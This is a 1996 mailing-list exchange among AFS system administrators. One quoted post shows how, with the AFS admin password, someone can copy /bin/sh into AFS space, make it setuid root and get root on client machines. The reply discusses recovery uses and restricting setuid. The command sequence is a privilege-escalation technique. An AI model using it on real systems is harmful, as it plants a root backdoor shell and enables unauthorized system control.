Yes, this is firly well known and this can come in handy when said client
(or non afs-server server) gets in a messed up state. Also you can do this
on Solaris if you use gchown (the gnu version). One other note, you should
not generally copy /bin/sh to /afs/<your-cell> but rather
/afs/<your-cell>/<directory-with-system:administrators-only-rights> or
something similarly restrictive.
You cam also restrict setuid programs on a cell by cell basis. There has
been discussion in the past about getting this configurable by fileserver,
but to this point it is still vaporware.
Randall
On Thu, 10 Oct 1996, Tom Nguyen wrote:
: Hi all,
:
: At Brookhaven National lab, we just found something very interseting.
: That is if you know AFS admin password, you can become root on any
: AFS client machines in the cell (except Solaris machines). We did the following tests
: on AIX, SGI, HPUX and we succeded. Solaris somehow is smart enough to stop the
: break-in.
:
: login as user on any AFS client machine belong to your cell
: % klog admin
: % cd /afs/<your-cell>
: % cp /bin/sh .
: % chown root sh
: % chmod 4755 sh
: % ./sh
: % whoami
: root
:
: In other words, If I am AFS administrator, I can be root on any AFS client machines
: belong to my cell. Is it cool ?
:
: Tom Nguyen
:
